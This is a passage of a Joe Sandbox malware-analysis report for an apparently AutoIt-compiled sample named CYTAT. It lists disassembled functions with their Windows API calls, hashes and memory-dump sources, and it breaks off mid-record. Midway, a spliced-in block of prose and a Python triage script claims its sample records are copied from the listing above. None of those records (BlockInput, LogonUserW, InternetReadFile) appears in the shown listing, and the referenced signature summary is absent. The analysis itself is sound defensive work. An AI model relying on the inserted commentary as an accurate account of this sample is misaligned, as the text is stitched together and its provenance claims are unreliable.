                                                • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N@
                                                • API String ID: 0-1509896676
                                                • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
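The records above list, per disassembled function, the imported API calls with their call-site addresses (including calls reported from a callee as "Part of subcall function"), the similarity identifiers and the memory-dump provenance. When triaging a report like this one, the useful step is to pull those call lists out of the pasted text and match them against the behaviours the report's signature summary already flags (BlockInput, LogonUserW, WinINet reads, GetUserNameW, SetUnhandledExceptionFilter). The following Python is an added example, not part of the Joe Sandbox report or of the IDA plugin: it parses that record layout and returns the watchlisted calls with the function they sit in. The watchlist and its descriptions are the example's own assumption; the sample input is an excerpt of three records copied from the listing above and trimmed to the lines the parser needs.

```python
"""Parse Joe Sandbox-style per-function records and flag watchlisted API calls.

Added example, not part of the report. Record layout handled (as rendered above):
  APIs
  • Name.MODULE(arg,arg), ref: ADDR
    • Part of subcall function ADDR: Name.MODULE ref: ADDR
  Similarity
  • API ID: ...
  • Opcode ID: <sha256>        <- closes one record
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# One bullet line of the APIs list. Covers the three shapes in the report:
# with an argument list and trailing comma, without parentheses
# (e.g. "_wcslen.LIBCMT ref: ..."), and the "Part of subcall function" form.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function\s+([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)

# Watchlist is this example's assumption; the descriptions paraphrase the
# behaviours listed in the report's signature summary.
WATCHLIST = {
    "BlockInput": "blocks mouse and keyboard input (often used to hinder debugging)",
    "LogonUserW": "obtains a logon token to run as a different user",
    "InternetReadFile": "reads data from a WinINet handle (download)",
    "GetUserNameW": "reads the current user name",
    "SetUnhandledExceptionFilter": "installs a top-level exception filter",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                          # call-site address inside the image
    subcall_of: Optional[str] = None  # set when reported from a callee


@dataclass
class FunctionRecord:
    api_id: str = ""
    opcode_id: str = ""
    calls: list[ApiCall] = field(default_factory=list)


def parse_records(text: str) -> list[FunctionRecord]:
    """Split pasted report text into records; '• Opcode ID:' closes each one."""
    records: list[FunctionRecord] = []
    cur = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            sub, name, module, args, ref = m.groups()
            cur.calls.append(ApiCall(name, module, args.split(",") if args else [], ref, sub))
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = FunctionRecord()
    return records


def triage(records, watchlist=WATCHLIST):
    """Return (opcode_id_prefix, api, call_site, reason) for every watchlisted call."""
    hits = []
    for rec in records:
        for call in rec.calls:
            if call.name in watchlist:
                hits.append((rec.opcode_id[:12], call.name, call.ref, watchlist[call.name]))
    return hits


# Constructed sample: three records copied from the listing above, trimmed to
# the lines the parser needs.
SAMPLE = """\
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
• InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
APIs
• BlockInput.USER32(00000001), ref: 0045A38B
Similarity
• API ID: BlockInput
• Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
APIs
• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
Similarity
• API ID: LogonUser
• Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
"""

if __name__ == "__main__":
    for opcode, api, ref, why in triage(parse_records(SAMPLE)):
        print(f"{opcode}  {api:<28} @ {ref}  {why}")
```

The call-site address (`ref`) is what you take back to the disassembler: for the sample it points at the `BlockInput(1)` call at 0045A38B and the `LogonUserW` call at 00436CF9 listed above, so a hit can be checked against the surrounding code rather than trusted on the import name alone. Calls carrying `subcall_of` were attributed to a callee by the plugin and should be read in that callee, not in the record's own function.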
                                                APIs
                                                • DeleteObject.GDI32(?), ref: 0045953B
                                                • DeleteObject.GDI32(?), ref: 00459551
                                                • DestroyWindow.USER32(?), ref: 00459563
                                                • GetDesktopWindow.USER32 ref: 00459581
                                                • GetWindowRect.USER32(00000000), ref: 00459588
                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                • ShowWindow.USER32(?,00000004), ref: 00459865
                                                • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                • GetStockObject.GDI32(00000011), ref: 004598CD
                                                • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                • DeleteDC.GDI32(00000000), ref: 004598F8
                                                • _wcslen.LIBCMT ref: 00459916
                                                • _wcscpy.LIBCMT ref: 0045993A
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                • GetDC.USER32(00000000), ref: 004599FC
                                                • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                • String ID: $AutoIt v3$DISPLAY$static
                                                • API String ID: 4040870279-2373415609
                                                • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 0044181E
                                                • SetTextColor.GDI32(?,?), ref: 00441826
                                                • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                • GetSysColor.USER32(0000000F), ref: 00441849
                                                • SetBkColor.GDI32(?,?), ref: 00441864
                                                • SelectObject.GDI32(?,?), ref: 00441874
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                • GetSysColor.USER32(00000010), ref: 004418B2
                                                • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                • DeleteObject.GDI32(?), ref: 004418D5
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                • FillRect.USER32(?,?,?), ref: 00441970
                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                • String ID:
                                                • API String ID: 69173610-0
                                                • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                APIs
                                                • DestroyWindow.USER32(?), ref: 004590F2
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                • GetStockObject.GDI32(00000011), ref: 004592AC
                                                • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                • DeleteDC.GDI32(00000000), ref: 004592D6
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                • GetStockObject.GDI32(00000011), ref: 004593D3
                                                • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                • API String ID: 2910397461-517079104
                                                • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 1038674560-3360698832
                                                • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                APIs
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                • SetCursor.USER32(00000000), ref: 0043075B
                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                • SetCursor.USER32(00000000), ref: 00430773
                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                • SetCursor.USER32(00000000), ref: 0043078B
                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                • SetCursor.USER32(00000000), ref: 004307A3
                                                • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                • SetCursor.USER32(00000000), ref: 004307BB
                                                • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                • SetCursor.USER32(00000000), ref: 004307D3
                                                • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                • SetCursor.USER32(00000000), ref: 004307EB
                                                • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                • SetCursor.USER32(00000000), ref: 00430803
                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                • SetCursor.USER32(00000000), ref: 0043081B
                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                • SetCursor.USER32(00000000), ref: 00430833
                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                • SetCursor.USER32(00000000), ref: 0043084B
                                                • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                • SetCursor.USER32(00000000), ref: 00430863
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                • SetCursor.USER32(00000000), ref: 0043087B
                                                • SetCursor.USER32(00000000), ref: 00430887
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                • SetCursor.USER32(00000000), ref: 0043089F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Cursor$Load
                                                • String ID:
                                                • API String ID: 1675784387-0
                                                • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                APIs
                                                • GetSysColor.USER32(0000000E), ref: 00430913
                                                • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                • GetSysColor.USER32(00000012), ref: 00430933
                                                • SetTextColor.GDI32(?,?), ref: 0043093B
                                                • GetSysColorBrush.USER32(0000000F), ref: 0043094E
